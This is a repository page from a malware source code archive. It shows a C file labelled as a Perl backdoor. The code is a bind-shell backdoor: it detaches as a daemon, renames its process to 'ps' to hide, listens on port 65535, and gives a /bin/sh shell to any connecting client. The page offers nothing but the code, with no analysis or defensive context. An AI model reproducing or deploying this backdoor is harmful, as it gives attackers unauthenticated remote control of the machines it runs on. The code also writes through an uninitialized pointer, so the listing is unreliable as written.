ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
5d2e97bf16
MalwareSourceCode/Perl/Backdoor.Perl.Whoredoor.08
vxunderground 06828a0956
Add files via upload
2020-10-09 21:59:39 -05:00

73 lines
1.1 KiB
Plaintext
Raw Blame History

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
void mk_daemon();
int main(int argc, char **argv)
{
int lfd,cfd;
socklen_t len;
struct sockaddr_in cli,serv;
pid_t pid;
char **sh;
sh[0]="/bin/sh";
sh[1]=NULL;
mk_daemon();
strncpy(argv[0],"ps",sizeof(argv[0]));
lfd=socket(AF_INET,SOCK_STREAM,0);
bzero(&serv,sizeof(serv));
serv.sin_family=AF_INET;
serv.sin_addr.s_addr=htonl(INADDR_ANY);
serv.sin_port=htons(65535);
bind(lfd,(struct sockaddr *)&serv,sizeof(serv));
listen(lfd,5);
while(1)
{
len=sizeof(cli);
cfd=accept(lfd,(struct sockaddr *)&cli,&len);
if(!(pid=fork()))
{
dup2(cfd,0);
dup2(cfd,1);
dup2(cfd,2);
execve(sh[0],sh,NULL);
close(cfd);
exit(0);
}
close(cfd);
}
return 0;
}
void mk_daemon()
{
/* yes I did get this out of UNP */
int x;
pid_t pid;
if((pid=fork()) !=0)
{
exit(-1);
}
setsid();
signal(SIGHUP,SIG_IGN);
signal(SIGINT,SIG_IGN);
if((pid=fork()) !=0)
{
exit(-1);
}
chdir("/");
umask(0);
for(x=0;x<=64;x++)
{
close(x);
}
}
Reference in New Issue View Git Blame Copy Permalink